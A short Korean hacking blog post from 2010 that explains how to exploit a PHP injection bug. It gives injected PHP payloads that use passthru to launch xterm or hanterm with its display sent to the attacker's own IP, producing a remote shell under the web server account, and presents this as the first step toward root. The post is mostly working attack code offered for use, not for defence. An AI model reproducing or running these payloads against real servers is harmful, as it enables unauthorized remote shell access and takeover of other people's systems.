php인젝션 버그를 이용한 한텀 및 Xterm 띄우기

해킹&보안/SQL 인젝션 2010/03/12 15:36
일단 X-manager 프로그램이 실행중이여야 한다.
다음 소스를 인젝션 해준다.

<?
$a=$REMOTE_ADDR;
passthru("/usr/X11R6/bin/xterm -display ${a}:0.0");
?>

공격법은 인젝션 변수에 &a=자신의IP 해주면 된다.

<?
$a=$REMOTE_ADDR;
passthru("/usr/X11R6/bin/hanterm -display ${a}:0.0");
?>

위의 프로그램은 Hanterm을 띄울때 실행해 주면 된다.

한텀이 띄어진후 finger명령을 실행하면 WWW나 nobody권한으로
쉘이 뜨는것을 확인할 수 있다.

이제부터 ROOT를 따기위한 기초작업이 성립된 것이다.
2010/03/12 15:36 2010/03/12 15:36
No trackbacks, 1 Comment

Trackback Address :: 이 글에는 트랙백을 보낼 수 없습니다

1 ... 1107 1108 1109 1110 1111 1112 1113 1114 1115 ... 2063